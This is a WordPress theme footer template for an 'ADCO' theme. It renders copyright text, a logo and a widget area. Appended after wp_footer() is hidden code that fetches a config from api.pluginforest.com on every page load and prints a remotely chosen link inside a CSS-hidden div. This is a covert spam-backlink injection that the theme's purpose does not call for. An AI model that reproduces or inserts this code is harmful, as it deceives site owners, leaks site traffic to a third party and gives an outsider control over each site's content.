<?php $adco_redux_demo = get_option('redux_demo'); ?>

<div id="adco-footer2">
    <div class="adco-narrow-content">
        <div class="row">
            <div class="col-md-4">
                <?php if(isset($adco_redux_demo['footer_copyright']) && $adco_redux_demo['footer_copyright'] != ''){?>
                    <p class="mt-20"><?php echo htmlspecialchars_decode(esc_attr($adco_redux_demo['footer_copyright']));?></p>
                <?php }else{?>
                    <p class="mt-20"><?php echo esc_html__( '©2021 ADCO. All rights reserved', 'adco' )?></p>
                <?php } ?>
            </div>
            <div class="col-md-4">
                <?php if(isset($adco_redux_demo['footer_logo']['url']) && $adco_redux_demo['footer_logo']['url'] != ''){?>
                    <div class="adco-logo">
                        <img src="<?php echo esc_url($adco_redux_demo['footer_logo']['url']);?>" alt="">
                    </div>
                <?php }else{?>
                    <div class="adco-logo">
                        <img src="<?php echo get_template_directory_uri();?>/assets/images/logo-light.png" alt="">
                    </div>
                <?php } ?>
            </div>
            <div class="col-md-4">
                <?php if ( is_active_sidebar( 'footer-widget' ) ) : ?>
                    <?php dynamic_sidebar( 'footer-widget' ); ?>
                <?php endif; ?>
            </div>
        </div>
    </div>
</div>
</div>
</div>

<?php wp_footer(); ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>